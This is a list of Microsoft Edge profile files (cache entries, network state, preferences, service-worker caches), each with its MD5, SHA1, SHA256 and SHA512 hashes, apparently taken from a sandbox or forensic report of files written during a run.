C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000bf

MD5 9901c48297a339c554e405b4fefe7407
SHA1 5182e80bd6d4bb6bb1b7f0752849fe09e4aa330e
SHA256 9a5974509d9692162d491cf45136f072c54ddc650b201336818c76a9f257d4d2
SHA512 b68ef68c4dcc31716ce25d486617f6ef929ddbb8f7030dd4838320e2803dd6dd1c83966b3484d2986b19f3bd866484c5a432f4f6533bb3e72f5c7457a9bb9742

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 7a0e010aac0107842f952c1530a3c637
SHA1 4a0a0d48f908802249c4ca7c8a6b69e1bde02066
SHA256 a95d9d200f7017c71d89f3476354cf3a8e4370b2dd219483688f4d4ef7841fef
SHA512 abb5553f24bb7a6295e7916ba8c9ba727f6b20ecd698e3d16d6b0d96accebd0772fcfb5e231647d6e118766bfd819019c0aca897128fd284bbd4d85f6042b598

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe652f88.TMP

MD5 5b20510da33fb996fe47f284e95195d0
SHA1 e85be8018d3ddd313217b4ea9122c3e920ba5100
SHA256 949e893c427f3c9853d9e28aa04e98c56ff3ab65d61fc1e554dfc0ff18ccfc37
SHA512 85a56da79693b8387d9412f0a7d47a3db49953bfe6e467c1b84f9775e16c00052c7389fc616440b8ec54e4147e102261afc16a1b67503d175d49d8a6062c9208

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 fae253f28289575ad34f759ba7ad95ff
SHA1 7d4e54ad904a32b66bbc318536c6fa315565c3b9
SHA256 b6951ee1d368f735a2741dcf7540a11b026e47adc1c4edcfa588e38828c3c8cd
SHA512 5c5ac839ff2eb742cd0eb55e9b94ae9ca9dee23d5da4d07aff20d16fa70bb9b9f9c45aff22f925ac40d69659b478ab853c02ca3386ce8d6a4810f57a96b444d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 53667a34c0aea1190748e7a8e56fbaec
SHA1 f342cf6eb888f6e67f81649f74f7be7ded06b9ac
SHA256 975b2a317b39f17e594e54724ea00ca36302a5f3d5ce3bb2fbc2661652c3343a
SHA512 2048231297085b2c332a7a3dbad5cbfcf0ae0580156cf11b3e464b5d37919104d71ebcd790a1831fa9a431507f7fde99a72d958e1f988c46289b1ffec8a7b9a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_1

MD5 4a5900f8e56164977e742b5526538b22
SHA1 e293fa397c9f16562dc485e10721404c2e7d1aff
SHA256 c8d796e90b7cb640a5503c7fb16f8605784c57c100b5ed38884f68d53d48a993
SHA512 43062f0ec761585217a136d3338c05561d3399970f8b8e89c207d45cf43d8f93e606c3216d7dcd77931d651b27b8179e8657251df490a3c7ec1c3c5913bd6014

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a3

MD5 df1d27ed34798e62c1b48fb4d5aa4904
SHA1 2e1052b9d649a404cbf8152c47b85c6bc5edc0c9
SHA256 c344508bd16c376f827cf568ef936ad2517174d72bf7154f8b781a621250cc86
SHA512 411311be9bfdf7a890adc15fe89e6f363bc083a186bb9bcb02be13afb60df7ebb545d484c597b5eecdbfb2f86cd246c21678209aa61be3631f983c60e5d5ca94

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 0595b7f6171d93416faf206fcd5a1415
SHA1 427a5e98a2a94393b6e34b7a87cd1926fb5dc093
SHA256 b2000124ccd1bb329411e57704b4923fbfe198b5dbf5e4ca19f74768745c8f8b
SHA512 b923eb1b0e5825854ac73541d4c550eb7b579b2ce6d9a0574d56bee455336f8e18dbfd6efa38ced1158d03aadb9d38ff3f2a09cccd8a8df0cc1f594274fc6ac1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 04834af6412bf304d6a155f63209389b
SHA1 c8e00dbd6fbe8e852c2861a3e8d6fcc15c563c20
SHA256 8be4ee88d9bdf02c1ac464f7828a38dfe9d84075074abe0084f1a1b8c8e2115e
SHA512 372cd6824cabfe454e07780f799e05142d817d7a62a4eef9ed84b0269decc0ea5fd47242c18ea18cb285464a88b2926340b83f859637929936af19413e5a2042

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c6

MD5 8b2faae925aa6aad36665886d7be994e
SHA1 2800fe40428df2f253254e6edb1b75430a400f99
SHA256 3392235a153b864f964c6d79555af394341b9d0d434739e5a20b84e7c40d4e45
SHA512 6f44f92c3953f7623d7c2002262da00550cf7c5d6e5741dab71fed34943f4c9c1eb3e871480cc6aaed6b8ed59145bc4d4aa5f359a339e79b166f1eec90724b51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c7

MD5 e2f7fa049dcabacce8d45f2ca6a3d638
SHA1 e51501bb97446080f3590b6e6515401e3063bb27
SHA256 a31f7f64df8d0c7e6030fc03e46061a18f47c23756135bfed3d36c20589b631a
SHA512 b62f314e391c39c79fea787e8578e334588fbb05ea0d5d7bbacac3d873502291961ce7c58bb1df7dad957f3c313e9f0aacf854d458dd77560f5f300203e23f60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c3

MD5 97b97a5078f4541e6f90664aa96b63fa
SHA1 68f1f46c659eacd26594b0c7af364c52f2752164
SHA256 c11de051fb856023fcffa70f29c26267dedb12e1197da8d2874c4586e3ad8a24
SHA512 60e1d1c9d075bbbb48eacc1577cb18f5de03ef4a265a9863e2e4d513a64b07d03dcf2a839444df8fbc75640234f77ab4e0237f3ad4f7ea1040dd2927f2839d3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c5

MD5 482c43f3b7651e92364bda649a4f41cb
SHA1 7f493ad447e8c91331168b8d84bbf8655e8675b5
SHA256 dc84a25d08756cded03cc1b3a0e191ef1194d5490c3965908631ca474ed71c96
SHA512 8e4e2812b024dc0ba82d09c1bb197ea79f22574ea7128685302dc02d9383eea432695c3c4eeb38eeedfb892120d6ad49f76f363a23f26ba3cd06f92e7477b202

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000e3

MD5 36c1136e329b90f3329ba402c9598677
SHA1 8ccc399667617192495b3ecdf979b1601b160d7d
SHA256 4e4b9e11b81b1f9fa9e9800786215480cb1001a44ec6cbb3175195e0c30a84d4
SHA512 8cd87d4eb417df316dfb6af47375d1b64b34c1a3ce3c2e90f514521ed08ef3f7cf6e20b68ad88a4713831f9520b1556331a8e367289f0416338e6b02557074d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 bd3f820bb4ef284d0b2bb1056c45353f
SHA1 66d79e8f77cca9005b5edee4a21b3501165fbfbd
SHA256 0d9fd759d19ff78d95c48512a89ffa3406681d58689a1f854ce60eaf52486734
SHA512 663ec877270242ebca572b982f8c08a653d21af4795e8553eb81d8fe80d34720a2a6a079aa8dea8b4e6bb18941026c5d6b35a1cddc7e8a4e1bb2a696fde85ba4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000077

MD5 8e37ba24d8af4a4c48d433c7cfe15d4c
SHA1 028943014ff75e2cadedec1732ea7bc3fe95a655
SHA256 54e5e4ec1f3499ae215fff9208b65d92c678d929ba12dacd995fe73057ffd2e2
SHA512 538e44e321eea07613af8ff9a51f0dc6351bd77ec061a398a666cf2a2da6a9729f07784778f277437d3258c952332ae999370ddb84abdc6373888990bd13f66b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000cb

MD5 4d28d4f6a7672d0296cc958abadf2ad0
SHA1 6f08f305410a8a725a0d92823308006bb0b1a8ee
SHA256 0cb5f1cc3e8eeaf1933dc656109e07bd284ba1255bf7a0dad3e8049755546f30
SHA512 ebbcaeb9673824fd9dc0773eac73fd00b756f1b211c784263b58143bdc56fcf241cf4a34514e6d5ca92d259160afbae6c91dcb894b7ef3985fff85cf14a67a47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\c971e2fa-b8a2-47b5-a4ad-0a1b8ab2c3f5\1189fdfaeeff8977_1

MD5 4b53dba74cc20b18a67e6de563a75741
SHA1 0f95fa6465bbfb87bbe85392d0f95b49a8a76019
SHA256 95cab0735d5ee20ccef9688946d9eed39c4aedec940fc3a128fd8456e8c95560
SHA512 5d1afd72e8e7a7b319cfe71cf2ef32f4a11d78c108d674bc85024b3a6d29c89fd325fb38a5739d5ee962b909a754f424a221dac99a48d48f8b5f6d04d1b1ed4f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\c971e2fa-b8a2-47b5-a4ad-0a1b8ab2c3f5\1189fdfaeeff8977_0

MD5 01618e94ac28352e036fdcd9759b3f4d
SHA1 e26ca1135f1fa9f03287df5a8291a3f0cd59522c
SHA256 1e8e79de8c59f264d1d934439ca832c00ff7adaccde9ff946da8ca10fdc5a102
SHA512 055fa73ade74639692f818b5fe20b058f49da335a7b47c45ec9a88c14a5981b1086105c1395c51fe47c6bf6bd046e2dd9adcf7cce5815399c727c461419663ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000083

MD5 c530e7f62c67777d7e5147e08452a60d
SHA1 8c2fc6bb7c0962fe608f9b5c682e26e0fdce6e35
SHA256 4e2ebda8596e6e8e18af2ddb7daf2a7ce0addce410bc008c796a09ccbee400b7
SHA512 4927c87138552afb2a5a1bfd02ca05286ef1fa7df21d15018a355c0aa9ec193097e98cc06d89ea29cf45cfa48d1b47170d21222ed7b0dca86166e89330841c03

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009d

MD5 4d9c5e8bfd271febb1c39c035195b918
SHA1 2311a50287d0610ce4521461a0900dc9670ab561
SHA256 747e9da9de1fe569e353d2b59781cf7b0f2f844775f2e5e93b52d48bfab6019a
SHA512 fd529afe8d760f497e8fb625bbd3fa9efab4ee6af1a803199484879b625b1bee9c346fabb6e151d74db3c2f15f47721a96dfa57bb94d6cbba6bcc117d578bfd6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009e

MD5 396b01ac85cbb981aff2a122a49d151a
SHA1 d85b6722649c41ed2ac40611f636b6820f3e6101
SHA256 3b49dc3579d8ace767893c0d697718bfdee790e0e7b72fb3b349276522c3d7a6
SHA512 9fecfea644381fdcba54f877df1e79ad8a02c1f721ed66fa55f886b7867ed6ae9b718c6774b78a0a2ad6fec573f5357270e7c8c001aa53fa58b2926f8df6204d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000103

MD5 b47cbb0e2a1d11e27287ac3d71dfdb35
SHA1 018c0219c44dd3ec0f736e3ece17cb31d53d9db0
SHA256 1f62e3b9384e59aa83d642665a03acfae7afa9f5c5170ebe267d1f34446db466
SHA512 6b59d97264adb195d89c821707dcb382d42e909c48cd25ad03616207a1d0864279ea63010c4efa928d6f4f2197c9eb5f436243e8638644068627db478fdae621

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009f

MD5 14ed181df6e1da5e0043f0e74d56beac
SHA1 1cfce75631f695c68b996d90bab28b8896ac0a65
SHA256 f6872bfd7ee2a8655f1974851c05e0f87ff7dfa707e00a00f2744b3dc2468cdd
SHA512 837ee3b662c282169c2fd233ed8b67ba577d0ea9d65fee850d0d0d11fc37317a533eba02fd046f461b3052c96d3270dc86363360b45d2ef53d85fa7a5c1c5ea6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000105

MD5 21905c192da74e4659b420cff198ab24
SHA1 db6c1832cef645666e735ad73eaebd193f2732af
SHA256 9a1d5ec662544ea6e0daf22a8d0827fe5df4f6b1b13dc8d839b9958d7d77c2b0
SHA512 5db6e67c94f2b7d8a3c1f451643f53c47698f2273f8240b148aee3f4a4b02a5ae7b4ae67a4fe8c1da02218423646e6fe69b26bd3bcf156a9fd08a3fc2c86b430

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a0

MD5 8f250a8a9272b16334ec75f930487a25
SHA1 700511b72466b885534d99f7615523ccf04ea0a1
SHA256 a4d67fc1333423b3d17b1b170117c5b4452dcd5553f7160013d2c27c793f8bdf
SHA512 78206fdcecd0b54cfa88b1da8df0dad6a6615a91dbaa38addbf15f5cfa55965f5b1c7424950378ff94ed8fcb39055c3d98f093103d3e2ce4e60e8c2595670dd5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000106

MD5 c68511dd520d2ac01e6f5b8685a4d339
SHA1 418a609c25a5b2fb984183643d29477f1045b603
SHA256 656d9b229770dbe3e0b2d0249885bb7f9225d68255f81c188df339a4427d9dcc
SHA512 c7e7395cda4adb805d2a7fe2ba10c96a8e07c57276a72820618e66ae0d2e463784a9e63f8c256d0e3762be81e1e3feffd85d7ccf8017273af954fb12e701179e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 b7675d993099a11342722e60453ee5b3
SHA1 0377b656beb29942df6a8547efd61424b4fd7af9
SHA256 5b006ff0be2173d6734eff55e5bdbe4dca385ce4924c5b80fb700ca3d22132d1
SHA512 96e6e3b0b1c0105318c02078cae62ae292a025392b05b529176df5cf90f0dfab655b7c07c096b7d5a857184ec5e44f02d9b7ab1345995981a39905dca13c0d1d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0b8b10cdc3d38fe760465123a3331562
SHA1 5b80910dc5dd4473d1d501cb608f7dca1fa71642
SHA256 4a9c35d132a4f2be1bbaae4d0e6e2161b01dcd3d1a544505428a0d0eb5d8d448
SHA512 12f18df35f4ce853f499f0ddd859668f0c96b4e404e751577522a028dd5efb05a6d798a7ee4fc9a987726a994041f89946dc1cbeb63a9a3d2f949cd37bab3006